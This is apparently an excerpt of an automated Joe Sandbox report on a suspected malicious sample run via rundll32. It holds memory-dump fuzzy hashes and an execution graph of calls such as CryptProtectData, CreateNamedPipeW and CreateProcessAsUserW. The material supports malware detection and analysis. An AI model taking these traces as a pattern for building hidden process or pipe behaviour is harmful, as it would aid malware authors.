                                                                                              • Source File: 00000004.00000003.1799415116.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_3_44f0000_rundll32.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0c794fc2b04448a400a478d6ffa8818d064079c0d7babd56a7a7b2b87cd5dd24
                                                                                              • Instruction ID: e203833c9666d914dfe06d9599b132bdc3e2c7c82fa14d125157ca8ce2bb2ee7
                                                                                              • Opcode Fuzzy Hash: 0c794fc2b04448a400a478d6ffa8818d064079c0d7babd56a7a7b2b87cd5dd24
                                                                                              • Instruction Fuzzy Hash: 1B01D631B0011887EF288B64CC542DEB7B2FF88314F1480BED105BB294DBBAA847C792
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000003.1799415116.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_3_44f0000_rundll32.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 958ac23607661a19cc3947f737d4804139468ce749999c403b366f467807a12d
                                                                                              • Instruction ID: cd8b5a3031fb26bf432b57b679ee2cd858ddba00820ce2d5b1f5adf4dd128236
                                                                                              • Opcode Fuzzy Hash: 958ac23607661a19cc3947f737d4804139468ce749999c403b366f467807a12d
                                                                                              • Instruction Fuzzy Hash: 880171363402149F8B04DA6DE89486EF7AAFBC8264355807BFA05C7310CF32EC028794
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000003.1799415116.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_3_44f0000_rundll32.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 132781cd3b09a9a18358ff8878c2093acdaffd37acc979935bec32d8136f56b5
                                                                                              • Instruction ID: c515c289624a88c7013e4f13986e7b1e2e308b08ebdeff93d314f99705a9dc4b
                                                                                              • Opcode Fuzzy Hash: 132781cd3b09a9a18358ff8878c2093acdaffd37acc979935bec32d8136f56b5
                                                                                              • Instruction Fuzzy Hash: 551106B1D042098FDB14DFAAC885ADEFBF4FF88324F10841AD559A7240CB746945CFA5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000003.1799415116.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_3_44f0000_rundll32.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9826db48e8b69c5e2c54363ee2c6fe842ea17b83f372b6fc56d4e0999a49919a
                                                                                              • Instruction ID: fe76d74aaa2e92e1df87b99d2b50538aeed63cbc14e527071bd93f8ea3faeecf
                                                                                              • Opcode Fuzzy Hash: 9826db48e8b69c5e2c54363ee2c6fe842ea17b83f372b6fc56d4e0999a49919a
                                                                                              • Instruction Fuzzy Hash: 1B01B5706093456FDF099F7458361663FE9DFC260470508ABD64ECF262E924DC0587D3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000003.1799415116.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_3_44f0000_rundll32.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: fe6b772228c3953d52f59814c17d4a92c7629d437171f61320dd80d4eec88ede
                                                                                              • Instruction ID: aa0a3126c4192aee71674f6e12a3a6c1cf660d20056de3ec73571cc4d57ba540
                                                                                              • Opcode Fuzzy Hash: fe6b772228c3953d52f59814c17d4a92c7629d437171f61320dd80d4eec88ede
                                                                                              • Instruction Fuzzy Hash: F611FB35A00215AFEB04DFA4D855AE9BFB6EFCC311F144019E50AE73A0DB796D45CBA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000003.1799415116.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_3_44f0000_rundll32.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3127de2db7a593225e3bcfb5e51f33c9b0b1aeccbdb17744dcc4aa77d4404eb5
                                                                                              • Instruction ID: 5a59ab416873075469d7cf704ce2bb872db7576fa4e8a79509fe8e0de430dc2d
                                                                                              • Opcode Fuzzy Hash: 3127de2db7a593225e3bcfb5e51f33c9b0b1aeccbdb17744dcc4aa77d4404eb5
                                                                                              • Instruction Fuzzy Hash: 47019231B0010497EF18AB6A889479FBAE69BC9254F21802ED605AB391CF799D0787D1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000003.1799415116.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_3_44f0000_rundll32.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 71411204990a852b1e636811e90ba9479c9a395cc85769f44b5acf643c8882d8
                                                                                              • Instruction ID: 55e8c1e5d8b1b7c75150bfbd6d02dc98bed2ca6be31e59066530270203fbf5a1
                                                                                              • Opcode Fuzzy Hash: 71411204990a852b1e636811e90ba9479c9a395cc85769f44b5acf643c8882d8
                                                                                              • Instruction Fuzzy Hash: 2701DF31A10108E7FF18EA69CA557AF7ABA9BC8704F50802FD606E7381CE756D018B91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000003.1799415116.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_3_44f0000_rundll32.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9547950c241587af1e704771d6a16c682fb8376578a5eb208d2a1e5f7a628dbc
                                                                                              • Instruction ID: 39c8fffe72198002e99aa284968619daca549a000237a989ef0d4ac7bb0f90ea
                                                                                              • Opcode Fuzzy Hash: 9547950c241587af1e704771d6a16c682fb8376578a5eb208d2a1e5f7a628dbc
                                                                                              • Instruction Fuzzy Hash: 80F07832B042309BFF1516A55C253BE67A3DBC0308F05816FC309AF7D6DA26B8438380
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000003.1799415116.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_3_44f0000_rundll32.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e9cf2290c034172f1db92e0026d0a4f723eab4a19972105f2845d928e1e02b4d
                                                                                              • Instruction ID: 81acfba2894354c44431c0c8b367ea6ab50f5c1316efc8ab6fa699ffa6bfe794
                                                                                              • Opcode Fuzzy Hash: e9cf2290c034172f1db92e0026d0a4f723eab4a19972105f2845d928e1e02b4d
                                                                                              • Instruction Fuzzy Hash: D0018431B0010887EF18AB7AC85479F7AE69FC9244F21846ED505A7391CF756D06CBD1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1800238941.000000000415D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0415D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_415d000_rundll32.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c0162a11bc854a25d7478d143702d6215bfff17b1d55e1535a471bc93272a37a
                                                                                              • Instruction ID: a8ef96df61ebc81311605e4fa9eda798afc4716855aad81e0b37e2fb46c41d36
                                                                                              • Opcode Fuzzy Hash: c0162a11bc854a25d7478d143702d6215bfff17b1d55e1535a471bc93272a37a
                                                                                              • Instruction Fuzzy Hash: CD01F271108340DAE7208E29FCC4BA7BFD8DF51325F18C45AEC284B292C778A842CBB1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1800238941.000000000415D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0415D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_415d000_rundll32.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 89fa8eea6eb67cd37797348bf9aecb1654d1b9263d59fe4147886fd1a5b8c9ec
                                                                                              • Instruction ID: bf7d240d2eb67fe8c34b8d5558b4d9bc103cec0e79be84d26dc18f93be639634
                                                                                              • Opcode Fuzzy Hash: 89fa8eea6eb67cd37797348bf9aecb1654d1b9263d59fe4147886fd1a5b8c9ec
                                                                                              • Instruction Fuzzy Hash: 1701B17200E3C09EE7128B259C94B52BFA4DF53225F09C0CBDD888F2A3C3689844C772
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000003.1799415116.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_3_44f0000_rundll32.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c2f0f53510e48da2af9846ef2ee4fab23f5242d4ee2638c80b55f2562f263079
                                                                                              • Instruction ID: b0e18b40eadca59410a6ab80ea315266ca2a241b41dec5fe387804a5f43a9994
                                                                                              • Opcode Fuzzy Hash: c2f0f53510e48da2af9846ef2ee4fab23f5242d4ee2638c80b55f2562f263079
                                                                                              • Instruction Fuzzy Hash: C5F050B630470057DF149D176CD47BF7B56EFC8614B04402FEB0983393DE68680782A1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000003.1799415116.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_3_44f0000_rundll32.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9047370e883bce19e625eeb6c6c55b9f930513800fbf5be672781f4e6cdfd869
                                                                                              • Instruction ID: 7dcb8dfeefdd4eb9e0fd90737af686b96d95a8044bf21dea63778312ead39ec8
                                                                                              • Opcode Fuzzy Hash: 9047370e883bce19e625eeb6c6c55b9f930513800fbf5be672781f4e6cdfd869
                                                                                              • Instruction Fuzzy Hash: FAF04F70A053455AEB099FB458661AA3FD9EFC161470508ABC64ECF261E934DD0687D3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000003.1799415116.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_3_44f0000_rundll32.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 08ec6450d3091bd492b1346ed982bbaac9bcc8d57446f292f5c0e292a57fb600
                                                                                              • Instruction ID: 7c3c5a907ebd2e337be447f527e3531323522cf2f3200bd9b5a115e323d20a97
                                                                                              • Opcode Fuzzy Hash: 08ec6450d3091bd492b1346ed982bbaac9bcc8d57446f292f5c0e292a57fb600
                                                                                              • Instruction Fuzzy Hash: 4FF055B7B4C2841FE70251987CD099BBFA4D3E227475A00BBEA48CB342E615C40383A5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000003.1799415116.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_3_44f0000_rundll32.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f34b4a7df34a46958c6441eeba2ca1ebd2c70e6c3dbbedacce998718e6c7c9fd
                                                                                              • Instruction ID: 2cc71e924167fb7992ae98e35686bd3c5694e69c4c22ea65978d7c7bb0d18258
                                                                                              • Opcode Fuzzy Hash: f34b4a7df34a46958c6441eeba2ca1ebd2c70e6c3dbbedacce998718e6c7c9fd
                                                                                              • Instruction Fuzzy Hash: D6F089713403154F9711DA6EEC9095BFFD9EBD4695340842AF91987300DF64EC054BD0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000003.1799415116.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_3_44f0000_rundll32.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 795525f4a36739f7fca5fd28b019f66cf11e4c56d0673b4ce85d35249dd96030
                                                                                              • Instruction ID: 250e481df8ae2192fd4ab7e9d0e0e4846fb905dff050128f87aca91cead27def
                                                                                              • Opcode Fuzzy Hash: 795525f4a36739f7fca5fd28b019f66cf11e4c56d0673b4ce85d35249dd96030
                                                                                              • Instruction Fuzzy Hash: ADF0E5367093845FD3059A29E890AD7BB65DFC6238F1440BBEA18CB256CD359847C7A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000003.1799415116.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_3_44f0000_rundll32.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: fb6888816e635123b352d9f92250ad22fcf13320954668ae9418c948ffdc280e
                                                                                              • Instruction ID: 5b25684e2ce5b9deb03460f6b66b5b3d7c8829a5315bd92bda0825c3d30601a0
                                                                                              • Opcode Fuzzy Hash: fb6888816e635123b352d9f92250ad22fcf13320954668ae9418c948ffdc280e
                                                                                              • Instruction Fuzzy Hash: 51F0EC20724E500BFF1855A5DC503A71F896B42618F4001EFD54587783D4C5E84723B2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000003.1799415116.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_3_44f0000_rundll32.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 102101482caf451eff90c09619cfcfc9cc2de4cef33d058f0c594d2333f058c0
                                                                                              • Instruction ID: d53320b5b7b77cc5b433a81936cf4674041d50d11d7e205b7149d9872d3809e8
                                                                                              • Opcode Fuzzy Hash: 102101482caf451eff90c09619cfcfc9cc2de4cef33d058f0c594d2333f058c0
                                                                                              • Instruction Fuzzy Hash: 3CE026327102089BD304992AE850957F7AADBC8268F10407AE50CC3315CD32AC028690
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000003.1799415116.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_3_44f0000_rundll32.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f7d0fc21118129b93f1c0c14544592988cd159f6ffe0cc0c8f3efcb7057a38e8
                                                                                              • Instruction ID: 9c32d8a9306d0f6bba7941281d379fbc63345dd38f1370222b9e103c2d20dec3
                                                                                              • Opcode Fuzzy Hash: f7d0fc21118129b93f1c0c14544592988cd159f6ffe0cc0c8f3efcb7057a38e8
                                                                                              • Instruction Fuzzy Hash: 1BD05E66AA12101BFB042AB069462E7A75CDB96135F1144ABEA198B203E9AE4C4712E0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000003.1799415116.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_3_44f0000_rundll32.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b6c9cf3640580710d528ff8fedb79e6dc7c030e26c3e286958b92bd969a087ca
                                                                                              • Instruction ID: 0bdd5906e50dbfb5653a20e0bf5fe978e99206f688233a597e3144acb3348523
                                                                                              • Opcode Fuzzy Hash: b6c9cf3640580710d528ff8fedb79e6dc7c030e26c3e286958b92bd969a087ca
                                                                                              • Instruction Fuzzy Hash: 07E04FB1906348DFC701DFA4E95159CBFB0EB01216B0145E9EC08D7253EA345F069751
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000003.1799415116.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_3_44f0000_rundll32.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ae14662c2c6c37548cb63467140f5cfcc6baad6ad41839f00794d5c530b85b5d
                                                                                              • Instruction ID: dac12969d4077df5d05688cf9048113764f77c500b301e918ea66f9e5a94c909
                                                                                              • Opcode Fuzzy Hash: ae14662c2c6c37548cb63467140f5cfcc6baad6ad41839f00794d5c530b85b5d
                                                                                              • Instruction Fuzzy Hash: A3D02B322592981FC309E750B84A0E47F64EB56221304406BEA46C7263DC211D53C3C0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000003.1799415116.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_3_44f0000_rundll32.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 32ecc6c50d53766eb1163fb6e9df7c58feaecb6f6a749118c230ff1efdab2ffc
                                                                                              • Instruction ID: b75748ecfffc0e6e359fb0dbe8d0321bed980de82f01ea32cd08fb130f0f3d23
                                                                                              • Opcode Fuzzy Hash: 32ecc6c50d53766eb1163fb6e9df7c58feaecb6f6a749118c230ff1efdab2ffc
                                                                                              • Instruction Fuzzy Hash: 9FD0A73232011C6B9A086619DC8596A7B99E7D53617504427FB0683220DD717C018395
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000003.1799415116.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_3_44f0000_rundll32.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 89776ae903a7c623c00aea25cf2b18ac914bee86ede24007191461d31ca132cb
                                                                                              • Instruction ID: 5a6d745f783bd4a247a114dd93b4b8cabf067e94cb95c3353029397728e5ebce
                                                                                              • Opcode Fuzzy Hash: 89776ae903a7c623c00aea25cf2b18ac914bee86ede24007191461d31ca132cb
                                                                                              • Instruction Fuzzy Hash: BFD05E70A0130CEFCB40DFA8E94159DFBF9EB44206B1049A9EC0DE3241EA31AF04AB81
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000003.1799415116.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_3_44f0000_rundll32.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1a758fb0409c820250df7269c241a8a34b7076a6fbf9c8bf6d1ea76eec940efb
                                                                                              • Instruction ID: 5c128683505c94fa1d44d3a57132634b6bd1e81ffead1b4794159ce76403df55
                                                                                              • Opcode Fuzzy Hash: 1a758fb0409c820250df7269c241a8a34b7076a6fbf9c8bf6d1ea76eec940efb
                                                                                              • Instruction Fuzzy Hash: C1D05B7090030DEFCB00DFA8D94155DB7F5FB44205F1045A8D808E3200EF316F40AB90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000003.1799415116.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_3_44f0000_rundll32.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ad33e1c4f72aa54eda1d96c9d71d72ddbaa8f452582f98caa261d41326f3a60f
                                                                                              • Instruction ID: 8c84166bdc904ec20f562511550e40b192a173d18804f0274214e15571fdf454
                                                                                              • Opcode Fuzzy Hash: ad33e1c4f72aa54eda1d96c9d71d72ddbaa8f452582f98caa261d41326f3a60f
                                                                                              • Instruction Fuzzy Hash: C4D080724697C45FF75B43480D534E53B30E6B33153C4835BC48489153D13E6517D235

                                                                                              Execution Graph

                                                                                              Execution Coverage:12.6%
                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                              Signature Coverage:4.1%
                                                                                              Total number of Nodes:314
                                                                                              Total number of Limit Nodes:21
                                                                                              execution_graph 39601 19036b0 39602 19036c6 39601->39602 39603 1903764 39602->39603 39606 190e5e7 39602->39606 39604 1903739 39607 190e614 39606->39607 39609 190e62e 39606->39609 39607->39609 39614 190eaa8 39607->39614 39618 190ea99 39607->39618 39608 190e674 39622 40f0ba0 39608->39622 39625 40f0bb0 39608->39625 39609->39604 39616 190eace 39614->39616 39615 190eb06 39615->39608 39616->39615 39628 190eb50 39616->39628 39620 190eace 39618->39620 39619 190eb06 39619->39608 39620->39619 39621 190eb50 3 API calls 39620->39621 39621->39619 39647 40f0bef 39622->39647 39623 40f0bd5 39623->39609 39626 40f0bd5 39625->39626 39627 40f0bef CryptProtectData 39625->39627 39626->39609 39627->39626 39629 190eb8e 39628->39629 39635 190f788 39629->39635 39630 190edb7 39631 190ee2f 39630->39631 39639 40f095a 39630->39639 39643 40f0a08 39630->39643 39636 190f7ac 39635->39636 39637 190f7b3 39635->39637 39636->39637 39638 190f930 3 API calls 39636->39638 39637->39630 39638->39637 39640 40f0963 39639->39640 39640->39630 39641 40f0510 3 API calls 39640->39641 39642 40f0a45 39641->39642 39642->39630 39645 40f0a0d 39643->39645 39644 40f0510 3 API calls 39646 40f0a45 39644->39646 39645->39644 39646->39630 39648 40f0c0d 39647->39648 39649 40f0c19 39647->39649 39648->39623 39653 40f11f8 39649->39653 39662 40f11f0 39649->39662 39650 40f0c95 39650->39623 39654 40f121d 39653->39654 39655 40f12e4 39653->39655 39654->39655 39659 40f11f8 CryptProtectData 39654->39659 39661 40f11f0 CryptProtectData 39654->39661 39671 40f144f 39654->39671 39675 40f14b3 39654->39675 39679 40f0f08 39655->39679 39659->39655 39661->39655 39663 40f121d 39662->39663 39666 40f12e4 39662->39666 39663->39666 39667 40f144f CryptProtectData 39663->39667 39668 40f11f8 CryptProtectData 39663->39668 39669 40f14b3 CryptProtectData 39663->39669 39670 40f11f0 CryptProtectData 39663->39670 39664 40f0f08 CryptProtectData 39665 40f150d 39664->39665 39665->39650 39666->39664 39667->39666 39668->39666 39669->39666 39670->39666 39672 40f1463 39671->39672 39673 40f0f08 CryptProtectData 39672->39673 39674 40f150d 39673->39674 39674->39655 39676 40f14c1 39675->39676 39677 40f0f08 CryptProtectData 39676->39677 39678 40f150d 39677->39678 39678->39655 39680 40f16f8 CryptProtectData 39679->39680 39682 40f150d 39680->39682 39682->39650 39468 5832d10 39469 5832d22 39468->39469 39470 5832d66 39469->39470 39474 5833115 39469->39474 39480 5833150 39469->39480 39485 5833178 39469->39485 39475 583312d 39474->39475 39477 583311a 39474->39477 39475->39470 39476 583311f 39476->39470 39477->39476 39490 1907490 39477->39490 39494 1907481 39477->39494 39482 5833155 39480->39482 39481 583315a 39481->39470 39482->39481 39483 1907490 3 API calls 39482->39483 39484 1907481 3 API calls 39482->39484 39483->39482 39484->39482 39487 58331a2 39485->39487 39486 58335f8 39486->39470 39487->39486 39488 1907490 3 API calls 39487->39488 39489 1907481 3 API calls 39487->39489 39488->39487 39489->39487 39491 19074ba 39490->39491 39492 19074d5 39491->39492 39498 190f930 39491->39498 39492->39477 39495 19074ba 39494->39495 39496 19074d5 39495->39496 39497 190f930 3 API calls 39495->39497 39496->39477 39497->39496 39499 190f953 39498->39499 39500 190f963 39498->39500 39501 190f95c 39499->39501 39508 190fab8 3 API calls 39499->39508 39509 40f48a0 3 API calls 39499->39509 39510 40f48b0 3 API calls 39499->39510 39500->39499 39502 190f930 3 API calls 39500->39502 39511 190a4c8 39500->39511 39516 190a4b8 39500->39516 39521 190fab8 39500->39521 39532 40f48b0 39500->39532 39538 40f48a0 39500->39538 39501->39492 39502->39499 39508->39499 39509->39499 39510->39499 39512 190a4f9 39511->39512 39513 190a4ed 39511->39513 39512->39513 39514 40f48a0 3 API calls 39512->39514 39515 40f48b0 3 API calls 39512->39515 39513->39499 39514->39513 39515->39513 39517 190a4f9 39516->39517 39518 190a4ed 39516->39518 39517->39518 39519 40f48a0 3 API calls 39517->39519 39520 40f48b0 3 API calls 39517->39520 39518->39499 39519->39518 39520->39518 39522 190fadb 39521->39522 39523 190faeb 39521->39523 39525 190fae4 39522->39525 39530 190f930 3 API calls 39522->39530 39531 190fab8 3 API calls 39522->39531 39524 190fb2c 39523->39524 39528 190f930 3 API calls 39523->39528 39529 190fab8 3 API calls 39523->39529 39524->39525 39544 40f0040 39524->39544 39549 40f0007 39524->39549 39525->39499 39528->39524 39529->39524 39530->39524 39531->39524 39534 40f48e4 39532->39534 39535 40f48d4 39532->39535 39533 40f48dd 39533->39499 39537 190f930 3 API calls 39534->39537 39535->39533 39597 40f66f0 39535->39597 39537->39535 39540 40f48e4 39538->39540 39541 40f48d4 39538->39541 39539 40f48dd 39539->39499 39543 190f930 3 API calls 39540->39543 39541->39539 39542 40f66f0 3 API calls 39541->39542 39542->39539 39543->39541 39545 40f005f 39544->39545 39554 40f0502 39545->39554 39559 40f0510 39545->39559 39546 40f00d1 39546->39525 39550 40f005f 39549->39550 39552 40f0502 3 API calls 39550->39552 39553 40f0510 3 API calls 39550->39553 39551 40f00d1 39551->39525 39552->39551 39553->39551 39555 40f0507 39554->39555 39556 40f0536 39555->39556 39564 583140b 39555->39564 39568 5831418 39555->39568 39556->39546 39560 40f0519 39559->39560 39561 40f0536 39560->39561 39562 583140b 3 API calls 39560->39562 39563 5831418 3 API calls 39560->39563 39561->39546 39562->39561 39563->39561 39565 583142a 39564->39565 39566 583144d 39565->39566 39572 583145b 39565->39572 39566->39556 39569 583142a 39568->39569 39570 583144d 39569->39570 39571 583145b 3 API calls 39569->39571 39570->39556 39571->39570 39573 5831480 39572->39573 39577 5831688 39573->39577 39585 5831678 39573->39585 39574 58314c0 39574->39566 39578 58316af 39577->39578 39579 5831730 39578->39579 39581 583179a CreateNamedPipeW 39578->39581 39593 58304ec 39579->39593 39584 5831861 39581->39584 39584->39574 39586 5831688 39585->39586 39587 5831730 39586->39587 39589 583179a CreateNamedPipeW 39586->39589 39588 58304ec CreateNamedPipeW 39587->39588 39590 5831790 39588->39590 39592 5831861 39589->39592 39590->39574 39592->39574 39594 58317b0 CreateNamedPipeW 39593->39594 39596 5831790 39594->39596 39596->39574 39598 40f6730 39597->39598 39599 40f0510 3 API calls 39598->39599 39600 40f674b 39599->39600 39600->39533 39778 5831e50 39779 5831ea4 ConnectNamedPipe 39778->39779 39780 5831ee0 39779->39780 39780->39780 39828 58301f0 39830 5830243 CreateProcessAsUserW 39828->39830 39831 58302d4 39830->39831 39832 5832070 39833 583208e 39832->39833 39835 58320a7 39833->39835 39838 58321c1 39833->39838 39836 58321c1 CreateFileA 39836->39835 39839 58321dd 39838->39839 39843 583f580 39839->39843 39847 583f590 39839->39847 39844 583f590 39843->39844 39851 583da68 39844->39851 39848 583f5a3 39847->39848 39849 583da68 CreateFileA 39848->39849 39850 58320d0 39849->39850 39850->39836 39852 583f5e0 CreateFileA 39851->39852 39854 583f715 39852->39854 39707 40f054a 39708 40f055d 39707->39708 39709 40f057a 39708->39709 39713 40f6860 39708->39713 39717 40f6813 39708->39717 39721 40f67cf 39708->39721 39715 40f6886 39713->39715 39714 40f68fb 39714->39709 39714->39714 39715->39714 39725 40f6998 39715->39725 39719 40f6886 39717->39719 39718 40f68fb 39718->39709 39719->39718 39720 40f6998 3 API calls 39719->39720 39720->39718 39723 40f67ff 39721->39723 39722 40f68fb 39722->39709 39722->39722 39723->39722 39724 40f6998 3 API calls 39723->39724 39724->39722 39726 40f69c8 39725->39726 39728 40f6ac2 39726->39728 39732 40f69dc 39726->39732 39727 40f6b38 39727->39714 39728->39727 39729 40f2970 3 API calls 39728->39729 39731 40f6b26 39729->39731 39731->39714 39734 40f6b42 39732->39734 